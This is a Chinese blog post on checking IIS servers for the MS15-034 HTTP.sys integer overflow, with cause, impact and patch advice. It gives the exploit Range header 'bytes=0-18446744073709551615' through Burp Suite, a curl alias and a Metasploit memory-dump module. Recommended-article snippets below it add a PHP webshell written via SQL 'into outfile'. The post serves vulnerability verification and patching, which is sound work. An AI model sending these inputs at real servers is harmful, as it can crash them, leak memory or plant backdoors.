http.sys整数溢出漏洞(MS15-034)验证方法

最新推荐文章于 2023-06-16 08:23:07 发布
最新推荐文章于 2023-06-16 08:23:07 发布
阅读量3.7k 收藏 4
点赞数 2
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blue_starry_sky/article/details/113035140
版权

 

漏洞成因:

18446744073709551615转为十六进制即是 0xFFFFFFFFFFFFFFFF(16个F),是64位无符号整形所能表达的最大整数,这个“整数溢出”必然同这个异常的超大整数有关,若IIS服务器返回“416 Requested Range Not Satisfiable”,则是存在漏洞,若返回”The request has an invalid header name“,或其他状态码则说明漏洞已经修补。

漏洞危害:

利用该漏洞构造恶意的http请求数据包,可使服务器系统蓝屏崩溃,对服务器能造成宕机影响。

修复建议:

安装微软官方补丁,补丁地址如下:https://technet.microsoft.com/zh-cn/library/security/ms15-034

验证方法一,使用burpsuit进行验证

对目标网站抓包,一般使用.js、.css、或图片类文件进行验证,如下图:

在数据包中加入Range: bytes=0-18446744073709551615,然后点击发送,如下图:

发现提示416,且为IIS服务器,说明存在这个漏洞。

验证方法二,使用metasploit(msf)进行验证

启动msf,查询漏洞ms15-034,使用第二个模块进行验证,use auxiliary/scanner/http/ms15_034_http_sys_memory_dump,如下图:

配置好各项参数后,run一下就可以验证该漏洞

验证方法三,使用windows子系统进行验证

windows打开命令窗输入bash启动windows子系统,进入子系统,切换目录后插入代码如下图:

cd ~
cat .bashrc
在最后一行插入
alias http.sys="curl -I -H 'Range: bytes=0-18446744073709551615'"

然后保存,直接使用命令http.sys即可,如下图:

这样以后验证起来可以直接启动子系统,使用http.sys加目标地址,会比使用msf或者burp方便一点。

Blue_Starry_sky
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MS15-034 HTTP.sys远程执行代码漏洞(原理扫描)
11-16
Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。Microsoft Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。 使用Microsoft IIS 6.0以上版本的Microsoft Windows的HTTP协议堆栈(HTTP.sys)中存在远程执行代码漏洞,该漏洞源于HTTP.sys文件没有正确分析经特殊设计的HTTP请求。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。Microsoft Windows 7 SP1,Windows Server 2008 R2 SP1,Windows 8,Windows 8.1,Windows Server 2012 和Windows Server 2012 R2。
HTTP.sys远程执行代码漏洞验证及复现——CVE-2015-1635、MS15-034
热门推荐
7Riven's blog
12-07 1万+
目录 漏洞概述 漏洞环境部署 漏洞验证 漏洞利用:ms15_034 漏洞防御 漏洞概述 HTTP.sys简介 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sysHTTP.sys远程代码执行漏洞实质是HTTP.sys整数溢出漏洞 漏洞成因 远程执行代码漏洞存在于 ...
网络安全进阶篇(十二章-2)HTTP.SYS远程代码执行漏洞(MS15-034)
划水的小白白
08-31 4212
1.简介 漏洞编号:CVE-2015-1635(MS15-034 ) 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中, 当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 2.影响范围 任何安装了微软IIS 6.0以上的 Win Server 2008 R2、 Win Server 2012、 Win Server 2012 R2、 Win 7、 Win 8、 Win 8.1
MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞漏洞验证
LiBai'S BLOG
08-18 8626
以下内容并非在靶场,是在真实环境进行漏洞验证。 1️⃣漏洞测试 使用curl工具进行测试,测试命令: curl http://1.1.1.1 -H "Host: 1.1.1.1" -H "Range: bytes=0-18446744073709551615" 2️⃣漏洞验证 ????利用ms15-034漏洞读取服务器内存数据 借助metasploit平台: use auxiliary/scanner/http/ms15_034_http_sys_memory_dump set rhosts 1.
ms15-034漏洞监测脚本
05-09
可以通过使服务器蓝屏崩溃监测服务器是否存在漏洞,以便修改加固。
如果你的C++程序打印出了“18446744073709551615”
珍惜时间
05-24 1万+
在做一个字符查找程序(在一个string中找‘|’)时,使用的find函数,查找成功会给你返回第一个字符的索引,查找失败时会给你返回string::npos,使用cout输出就是18446744073709551615,是64位机能表示的最大数了。它等于2的64次方-1。所以不用担心,这不是错误。
c语言中 1是真吗,c – 为什么(18446744073709551615 == -1)是真的?
weixin_42427302的博客
05-21 1568
18,446,744,073,709,551,615提到的这个数字,18,446,744,073,709,551,615,实际上是2 ^ 64-1.这里重要的是2 ^ 64-1基本上是基于0的2 ^ 64.无符号整数的第一个数字是0,而不是1.因此,如果最大值为1,则它有两个可能的值:0或1(2).让我们看看64位二进制中的2 ^ 64 – 1,所有位都打开.11111111111111111...
网络系统安全——MS15_034漏洞利用与安全加固
旺仔Sec&blog
06-16 4562
下面我们来针对该漏洞进行临时修复(可能降低IIS性能),回到靶机服务器上,打开Internet信息服 务(IIS)管理器,找到Default Web Site主页内容,选择输出缓存,点击打开功能。使用BurpSuite发送测试代码,方便观察回包的数据,打开桌面上的burpsuite,并开启浏览器代理,再次访问目标的默认站点页面,右键点击空白处选择Send to Repeater。注:返回内容不再是416错误,而是正常页面。注:可以看见,上图里有两个模块,分别是dos拒绝服务模块,HTTP.sys扫描模块。
网络空间安全——MS15_034漏洞验证与安全加固
Jay
12-21 1632
1.安装iis7.5,用127.0.0.1访问,将访问页面截图。4.将测试结果进行截图,判断是否存在ms15_034漏洞。3.调用msf相应的测试模块进行扫描,将测试模块截图。靶机:windows 2008 安装好iis7.5。5.使用拒绝服务模块,来进行测试,将模块名称截图。分析是否存在ms15_034漏洞,抓包验证截图。8.再次利用拒绝服务攻击,验证是否还存在漏洞。6.用拒绝服务模块进行攻击的结果进行截图。7.对靶机进行修补,将修补过程进行截图。2.用burpsuite。
protobuf 报 : system_error what(): Unknown error 18446744073709551615
我喜欢雨天的清新的博客
07-04 1079
解决方案   你引用的动态库使用了线程库,但是你没有链接线程库导致的问题,解决 -lpthread
MS15-034-Scanner:支持通过httphttps扫描MS15-034漏洞的应用程序
05-16
MS15-034-扫描仪 MS15-034-Scanner是Windows命令行实用程序,它扫描[MS15-034]( )漏洞的一个或多个URL。以非破坏性的方式该实用程序使用原始套接字来执行扫描,从而绕过大多数本机.NET Web浏览器或客户端(阻止...
HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635) 漏洞修复
08-21
Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)
CVE-2015-1635、MS15-034Http.sys的利用工具)
11-10
利用 Http.sys 驱动对urlacl进行操作,由于Http.sys是IIS服务器的基础,其优先级高于IIS,不会造成端口bind冲突,达到端口服用效果,由于与受害机对外服务端口相同,可做到极高的隐蔽性。由于其生效后效果很类似于...
John介绍及常用命令使用说明
Blue_Starry的博客
03-10 1万+
john是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如DES、MD4、MD5等。John支持字典破解方式和暴力破解方式。它支持多种不同类型的系统架构,包括Unix、Linux、Windows、DOS模式、BeOS和OpenVMS,主要目的是破解不够牢固的Unix/Linux系统密码。 在对john输入
sql语句利用into outfile写入一句话
Blue_Starry的博客
03-04 6685
利用需要的条件有: 1、对web目录需要有写权限能够使用单引号 2、知道绝对路径 3、没有配置-secure-file-priv 当知道路径时,可以直接用?id=1 union select "<?php @eval($_POST['123']);?>" into outfile("C:/phpStudy/WWW/a.php") 或者采用PHPmyadmin,选择一个数据库如...
渗透测试流程
Blue_Starry的博客
04-19 3985
1.信息收集 主动收集 通过访问目标地址,和相关地址或者通过扫描等方式收集信息; 优点:收集到的信息比较多; 缺点:可能会被记录自己的操作信息,导致打草惊蛇; 被动收集 通过第三方的服务来收集目标的相关信息; 优点:基本上对方处于无感知状态; 缺点:收集内容有限,速度较慢; 一般情况下,最好先采用被动收集的方法去收集信息,然后采用主动收集去有目的的收集在被动收集过程中缺少的信息; 需要收集的信息 ...
浏览器代理结合Xray扫描
Blue_Starry的博客
01-23 1495
Xray是一个方便有用的漏洞扫描工具,综合了许多常见的poc和漏洞,怎样才能更好的使用xray去发现漏洞? 最简单的方法是直接使用浏览器+xray,然后需要主动去触发网站的内容,这样才能进行扫描。 首先,从GitHub下载xray,启动xray使用命令 .\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output test.html 具体的参数意义可以去xray的readme.md查询,一般我喜欢将上述命令写成.bat
crawlergo.exe结合X-ray实现自动扫描
Blue_Starry的博客
01-23 1221
一般来说,使用X-ray扫描web漏洞就那几种方式,但是都需要人主动点击触发扫描这个过程,个人感觉不方便,最近发现github有人使用crawlergo.exe结合X-ray使用爬虫可以完全自动化扫描,可将扫描放到服务器上,然后等着收割漏洞。(附地址:https://github.com/timwhitez/crawlergo_x_XRAY) 但是下载后发现除了说明中提到的权限不足拒绝访问的问题,如下图: 出现拒绝访问的问题,按照说明文档的指引,删除crawlergo文件夹即可,但是还会出现系统找不
ms15-034修复打补丁
最新发布
08-31
您好!针对 ms15-034 的修复,您可以通过以下步骤来打补丁: 1. 首先,确保您的系统已经安装了最新的安全补丁。您可以在微软官方网站上查找并下载相应的补丁程序。 2. 下载适用于您的操作系统和架构的修复补丁。微软通常会提供适用于不同操作系统版本和架构(32位或64位)的修复补丁。 3. 在下载补丁之前,建议先备份您的系统和关键数据,以防意外情况发生。 4. 下载完补丁后,双击运行补丁程序,并按照提示完成安装过程。 5. 安装完成后,重新启动系统以使修复生效。 请注意,在打补丁前,请确保您从可信赖的来源下载补丁,并且在安装之前备份数据,以避免潜在的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值